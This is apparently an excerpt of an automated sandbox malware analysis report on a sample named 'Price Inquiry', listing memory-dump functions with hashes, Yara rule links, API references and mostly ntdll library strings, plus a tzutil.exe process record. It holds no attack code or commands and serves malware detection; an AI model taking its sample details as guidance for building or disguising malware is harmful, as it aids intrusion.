Opcode ID: 1393bd8f68d1e5a581fd91efb524899b2a9ff3cb8332ee0e830eb7f1336c14a0
Instruction ID: a87c3a01db48f96d264a09ba1d4dfb84217a9c15bdb2996db1e8e8905da455d3
Opcode Fuzzy Hash: 1393bd8f68d1e5a581fd91efb524899b2a9ff3cb8332ee0e830eb7f1336c14a0
Instruction Fuzzy Hash: 2190023120541403D20071585509707405597D0201F55D421E0424568DDA578A526222

Function 01712CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e947a1ae64f2487e675421782df54b3c885535d6ccbed1bf746aa4c2a7f76dfb
Instruction ID: 7c08ecbed31e01ab76842170e557a2c6ffba8c242cda23c8e9b71c46cd162d34
Opcode Fuzzy Hash: e947a1ae64f2487e675421782df54b3c885535d6ccbed1bf746aa4c2a7f76dfb
Instruction Fuzzy Hash: 0990022160941402D24071585419706406597D0201F55D021E0024564DCA5A8B5667A2

Function 01712CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620d47cd179ad28ad9795ac51e94469fcbf1917227bc33d36e716f4bda2e1d23
Instruction ID: b6eba0bbacb4a055dbe47fe8baa3822798b93027e838c01591122e316c05ed0e
Opcode Fuzzy Hash: 620d47cd179ad28ad9795ac51e94469fcbf1917227bc33d36e716f4bda2e1d23
Instruction Fuzzy Hash: 5E90023120541402D20075985409646405597E0301F55D021E5024565ECA668A926232

Function 01712F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca3c63cb077bb1e4e9737e40b71b940a47a98b0347e98ed830ebd6a4d0c2f95
Instruction ID: cfe0d6768804ca9dc39b598750775955a9ea8d040c318a766a12cc3205633a15
Opcode Fuzzy Hash: 9ca3c63cb077bb1e4e9737e40b71b940a47a98b0347e98ed830ebd6a4d0c2f95
Instruction Fuzzy Hash: 2A90026121541042D20471584405706409597E1201F55C022E2154564CC92A8E625226

Function 01712F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed0beb41d4e01d4c64774ee1ed54f5edf113c74cbddd76db0ea357ee3ea9d7b
Instruction ID: 4acda381934014576e3d970ec6ea8a2b822eaf070a33beee316c2a231bee8737
Opcode Fuzzy Hash: 2ed0beb41d4e01d4c64774ee1ed54f5edf113c74cbddd76db0ea357ee3ea9d7b
Instruction Fuzzy Hash: F990026134541442D20071584415B064055D7E1301F55C025E1064564DCA1ACE536227

Function 01712FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 757c8e8b32d7438f870a14d7328ce769dc96053a208a5804ca295b3b7f84914c
Instruction ID: 3ea57848ff096a4429418fb8c269ad8e1cf5cbe263c19738461f121dcbdf3363
Opcode Fuzzy Hash: 757c8e8b32d7438f870a14d7328ce769dc96053a208a5804ca295b3b7f84914c
Instruction Fuzzy Hash: 09900221215C1042D30075684C15B07405597D0303F55C125E0154564CCD168A625622

Function 01712FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b1f3ee7408cdd45a90149cdf5add2bc6b0a0f2bc1e6562d2469111de36314d3
Instruction ID: aab3ee1da1f6c76e3e3dfc1328eb13f2e841b27511cfca6f18654955f8b0579c
Opcode Fuzzy Hash: 5b1f3ee7408cdd45a90149cdf5add2bc6b0a0f2bc1e6562d2469111de36314d3
Instruction Fuzzy Hash: B1900221605410424240716888459068055BBE1211755C131E0998560DC95A8A665766

Function 01712FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f93f208d88d4dfb0ccd15fddcf76fb998cc68b8e7ccfa5dfb30a33ee23b05395
Instruction ID: c31bb391de68794304c63d650cae8bb4db1f8afb9f6412e38700e9c98824ab7d
Opcode Fuzzy Hash: f93f208d88d4dfb0ccd15fddcf76fb998cc68b8e7ccfa5dfb30a33ee23b05395
Instruction Fuzzy Hash: 4390023120581402D20071584809747405597D0302F55C021E5164565ECA66CA926632

Function 01712F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a03e34326d5e50feeeb1d70268121fc9d60869736726c68b3d03338d10581e6
Instruction ID: d44f686403eece4db705a133797b31974a26c15d2c5863d04b9ba4334b220805
Opcode Fuzzy Hash: 3a03e34326d5e50feeeb1d70268121fc9d60869736726c68b3d03338d10581e6
Instruction Fuzzy Hash: 5590023120581402D2007158481570B405597D0302F55C021E1164565DCA268A526672

Function 01712E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12f3e71775da6fdcc4ea4e209a1e32fdc69973ee363e91db34b24225e68d1002
Instruction ID: b9f2b2a74bbf81b084512a1528ca16f845a52b7ab0bcb7197b4ff0a05d822c2b
Opcode Fuzzy Hash: 12f3e71775da6fdcc4ea4e209a1e32fdc69973ee363e91db34b24225e68d1002
Instruction Fuzzy Hash: CD90022130541402D202715844156064059D7D1345F95C022E1424565DCA268B53A233

Function 01712EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e36b4b27e1df47c7299713e73a17156966d38c24e5ad51a07c7ee74649ea273
Instruction ID: cf02438b9556bbb9dfc01c7a929562c250d71475839aca7276dd102bd5803c2c
Opcode Fuzzy Hash: 5e36b4b27e1df47c7299713e73a17156966d38c24e5ad51a07c7ee74649ea273
Instruction Fuzzy Hash: 3390026120581403D24075584805607405597D0302F55C021E2064565ECE2A8E526236

Function 01712EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe8da6824152fbed77d0a4711d7dc62e940000486983957f1b2dd7b6f395a4c
Instruction ID: db9002ace8bce17cb0a836228ad31afcbb323ac4dc665545e6ed2e3ca825c796
Opcode Fuzzy Hash: 8fe8da6824152fbed77d0a4711d7dc62e940000486983957f1b2dd7b6f395a4c
Instruction Fuzzy Hash: 7290027120541402D24071584405746405597D0301F55C021E5064564ECA5A8FD66766

Function 01712E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1288cbc79842a2f5ec0a4eed969da8c98e3fe560f977cef9ba74630a7f8853
Instruction ID: e252f52d3e262447262df49ab957a8c8355e068c1707d999f7ac89ab4bd00732
Opcode Fuzzy Hash: 8e1288cbc79842a2f5ec0a4eed969da8c98e3fe560f977cef9ba74630a7f8853
Instruction Fuzzy Hash: 6D90022160541502D20171584405616405A97D0241F95C032E1024565ECE268B93A232

Function 01713010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d3f4e264fcfe97e110bab479871e0c7311536b3e1ceb353e509ba67fabc9c6
Instruction ID: b345f7dfb294fd6932cbfacf39e59db54d818f6d2304053b80121011a4d8fc7f
Opcode Fuzzy Hash: 01d3f4e264fcfe97e110bab479871e0c7311536b3e1ceb353e509ba67fabc9c6
Instruction Fuzzy Hash: 7990022120585442D24072584805B0F815597E1202F95C029E4156564CCD168A565722

Function 01713090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2409e6240cde2e0b1c08d2924ebc40a8c751f78a3f10383d9885763268fc65a
Instruction ID: bc2186d1aa0b95899ef3f34b8c30f937db815dc2ad3ef97d2de8660b413557c1
Opcode Fuzzy Hash: f2409e6240cde2e0b1c08d2924ebc40a8c751f78a3f10383d9885763268fc65a
Instruction Fuzzy Hash: 5C90022124541802D240715884157074056D7D0601F55C021E0024564DCA178B6667B2

Function 017139B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536d64b54e7c7fb2ae0802027658ed0b40f4e297b718af0688426683f462980d
Instruction ID: e7c685376d9f81e1657f9dcf978d28ac21b308461936a515eb0c8e1487cfb026
Opcode Fuzzy Hash: 536d64b54e7c7fb2ae0802027658ed0b40f4e297b718af0688426683f462980d
Instruction Fuzzy Hash: 4090022124946102D250715C44056168055B7E0201F55C031E08145A4DC9568A566322

Function 01713D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2b29d6c55954fac680e7da73a73cec1cc98e54da0b609e307dbd3da901619c
Instruction ID: 3a9fa9f2b8c82eb867c6de5daf030c81bceefd5fe247f118ce6267e2412759c6
Opcode Fuzzy Hash: 2e2b29d6c55954fac680e7da73a73cec1cc98e54da0b609e307dbd3da901619c
Instruction Fuzzy Hash: DD90023520541402D61071585805646409697D0301F55D421E0424568DCA558AA2A222

Function 01713D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5af819b0a7e70833eef14125de4b70f6b0512d7bee26eb1e51981156001d2
Instruction ID: c21b81134941556db1960a5bed1565f15b1f977bb029f1377c7d70f87875fd4b
Opcode Fuzzy Hash: a4b5af819b0a7e70833eef14125de4b70f6b0512d7bee26eb1e51981156001d2
Instruction Fuzzy Hash: BD90023120641142964072585805A4E815597E1302B95D425E0015564CCD158A625322

Function 01712C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 21d422a848e54e4956d95dc9e90b2f213722d077167a7033826aee98fc3944fb
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01712890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0171293C
___swprintf_l.LIBCMT ref: 0171295E
___swprintf_l.LIBCMT ref: 017129A3
___swprintf_l.LIBCMT ref: 0174A52E

Strings

ffff:, xrefs: 0174A504
::ffff:0:%u.%u.%u.%u, xrefs: 0174A54E
::%hs%u.%u.%u.%u, xrefs: 0174A527
:%u.%u.%u.%u, xrefs: 0174A5B8

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 02f7fabb9c36c233aa65cb45c119941aa230023a948b4dbfbe853759ff6f273a
Instruction ID: 5338127ed0817888ee1123dcb3fc4a63361b2b3d147f7f72794cfb997b6789aa
Opcode Fuzzy Hash: 02f7fabb9c36c233aa65cb45c119941aa230023a948b4dbfbe853759ff6f273a
Instruction Fuzzy Hash: 985108B2A40116BFDB21DF9C898097EFBB8FB08240760C169F566D764AD334DE008BE0

Function 01782410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017824A6
___swprintf_l.LIBCMT ref: 017824E2
___swprintf_l.LIBCMT ref: 0178257D
___swprintf_l.LIBCMT ref: 017825A3
___swprintf_l.LIBCMT ref: 017825C8
___swprintf_l.LIBCMT ref: 01782608

Strings

ffff:, xrefs: 0178247D, 0178249D
::ffff:0:%u.%u.%u.%u, xrefs: 017824DA
:%u.%u.%u.%u, xrefs: 017825FF
::%hs%u.%u.%u.%u, xrefs: 0178249E

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c87fe584b41498f8d1b6ae3a1f596a9424e158f11968f6445332eba19846019f
Instruction ID: 184825c2b74325128582617b995a33834342979adc4234e8c884de70644ed6fe
Opcode Fuzzy Hash: c87fe584b41498f8d1b6ae3a1f596a9424e158f11968f6445332eba19846019f
Instruction Fuzzy Hash: C551F575A80645AECB20EE5DC89097FF7F8EF44201B548499E49AD7642D674DE00C770

Function 01707630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017446FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01744655
CLIENT(ntdll): Processing section info %ws..., xrefs: 01744787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01744742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01744725
Execute=1, xrefs: 01744713
ExecuteOptions, xrefs: 017446A0

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: c7acf75cb0e8ecdf10f733dedfcc4d536427b2a9812d6746c70739b04983f9f9
Instruction ID: edcefba1d38ee4d1173777f0442756133efb08b1ecff5d597bdc0f6713e6d5f1
Opcode Fuzzy Hash: c7acf75cb0e8ecdf10f733dedfcc4d536427b2a9812d6746c70739b04983f9f9
Instruction Fuzzy Hash: 23511931600319FBEF16EAA8DC99BBDB7E8EF14340F1400D9E606A71C1DB70AA418F51

Function 0171B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0171B6BF

Strings

0, xrefs: 0171B66F
-, xrefs: 0171B650
+, xrefs: 0171B65A
0, xrefs: 0171B695

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 18f4fb0465e165f5bead5d8d15703270e28efdf0018df6bb3c2b108af860c0c7
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 9981E070E412498EEF25CF6CC8917FEFBB2AF94720F1C455AE861A7299C7309840CB61

Function 017820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0178214F
___swprintf_l.LIBCMT ref: 01782172

Strings

%%%u, xrefs: 01782146
]:%u, xrefs: 01782169
[, xrefs: 0178212B

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: a41283f71a4eef5ca6ed4dca67df9f4573c37efd037efaf64d8b31475d54d5e1
Instruction ID: fd28195f4338c5fe01f4e0ab24f5b3eab5f764bc996077cdbac8f919708d6240
Opcode Fuzzy Hash: a41283f71a4eef5ca6ed4dca67df9f4573c37efd037efaf64d8b31475d54d5e1
Instruction Fuzzy Hash: 3221517AE00119ABDB10EE69CC44ABEFBE9EF54651F54011AE905E3205E730D911CBA1

Function 016FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017402E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017402BD
RTL: Re-Waiting, xrefs: 0174031E

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 58a59327af7d42d70e673254a0cc867914a21cee3a6450677e9fef660c3cb4a1
Instruction ID: 16d34e184e8de55502fa79b6e8e85b0b07280380ee8c80e3e51b93bb7d737453
Opcode Fuzzy Hash: 58a59327af7d42d70e673254a0cc867914a21cee3a6450677e9fef660c3cb4a1
Instruction Fuzzy Hash: 2EE1BD326087419FD725CF28C884B6AFBE0BB88724F140A9DF6A58B3E1D775D945CB42

Function 0170BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01747B7F
RTL: Re-Waiting, xrefs: 01747BAC
RTL: Resource at %p, xrefs: 01747B8E

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: b42b8343e6c272977a565265e9d04f2b9d45c38788361a365993b7958d0552a2
Instruction ID: 82ea65f450dec83c2913c3dda75e3ccee00366c33b7bb44b6ca10d65e6e40410
Opcode Fuzzy Hash: b42b8343e6c272977a565265e9d04f2b9d45c38788361a365993b7958d0552a2
Instruction Fuzzy Hash: F441C1353047029FD726DE29C840B6AF7E5EF98710F100A1DFA5A9B680DB72FA45CB91

Function 0170B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0174728C

Strings

RTL: Re-Waiting, xrefs: 017472C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01747294
RTL: Resource at %p, xrefs: 017472A3

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 6d9898825caa08f038600886a98414d3f5db731a5290dc16962565532f14be05
Instruction ID: 700def0b9ddeb2cc9449dbd0badc917066731f00e9eee1febdab7d49e36b3b32
Opcode Fuzzy Hash: 6d9898825caa08f038600886a98414d3f5db731a5290dc16962565532f14be05
Instruction Fuzzy Hash: 2A41FD36708302ABC725CE29CC41B6AFBE5FB94710F100619FD55AB280DB71FA428BD1

Function 01782300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0178238D
___swprintf_l.LIBCMT ref: 017823B3

Strings

%%%u, xrefs: 01782384
]:%u, xrefs: 017823AA

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: f67bd6980f939e27e04f11d27dce96a4335a3488097161c6d5acc41229fb8663
Instruction ID: e825cc6fbd3f1d5016728eada3486fb94eb2011924d51858ce9ff6ebbb1f7c96
Opcode Fuzzy Hash: f67bd6980f939e27e04f11d27dce96a4335a3488097161c6d5acc41229fb8663
Instruction Fuzzy Hash: 02318676A00219AFDB20DE2DCC50BEEF7F8EF44611F944559E949E3605EB309A45CBA0

Function 01717D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01717E8B

Strings

-, xrefs: 01717DDD
+, xrefs: 01717DE8

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: ca51dd326937cb0931ee18ca90b77fbcc32fdcfb89bddc588a5cafdd1cfa4eb1
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 4491A371E0020A9BEF28DF6DC881ABFFBF9AF44720F54451AE955E72C8D73099818751

Function 016D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 016D9175
$, xrefs: 016D9191

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 3784f38e80fb4b470aa5334fd72a15e8638d6d7986bace933a788f078c2fd218
Instruction ID: b9c7b5ce40f6b6311129001a82d0fe8bef91ace86057088715364d10f12acd3b
Opcode Fuzzy Hash: 3784f38e80fb4b470aa5334fd72a15e8638d6d7986bace933a788f078c2fd218
Instruction Fuzzy Hash: E5811A71D00269DBDB31CB54CC45BEABBB4AF48714F1042EAEA19B7281D7709E85CFA4

Function 0175CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0175CFBD

Strings

@4Cw@4Cw, xrefs: 0175CFD5, 0175CFDA, 0175CFF1
@, xrefs: 0175CF0A

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 7faf7c38bfc223299b0308428b224e2d11a65b727c04a5f8ebc4f1dd930c28eb
Instruction ID: 487d1dc447fb5ee8d88124863652d209564a17561327da12971ad5a586bf7cce
Opcode Fuzzy Hash: 7faf7c38bfc223299b0308428b224e2d11a65b727c04a5f8ebc4f1dd930c28eb
Instruction Fuzzy Hash: 0641BDB1901215DFDB229FA9C884AAEFBF8FF54B50F00812EE905DB254D7B0C901CB65

Analysis Process: tzutil.exePID: 1136, Parent PID: 2264COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	1.6%
Total number of Nodes:	437
Total number of Limit Nodes:	73

Executed Functions

Function 00599B80 Relevance: 34.2, Strings: 27, Instructions: 423
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00599CF0
X, xrefs: 00599E77
G, xrefs: 00599E95
Eh, xrefs: 00599C9C
*, xrefs: 00599E32
Z, xrefs: 00599E50
-Y, xrefs: 0059A1A5
$6, xrefs: 00599D5C
-Y, xrefs: 00599D77
Rz, xrefs: 00599C5C
f, xrefs: 00599EA9
Yu, xrefs: 00599C74
}, xrefs: 00599E3C
L, xrefs: 00599C2A
E, xrefs: 00599D8C
d, xrefs: 00599C34
K, xrefs: 00599CC8
R,, xrefs: 00599BB5
B+, xrefs: 00599CB0
k, xrefs: 00599DE4
dn, xrefs: 00599DA8
h, xrefs: 00599C20
=, xrefs: 00599D9A
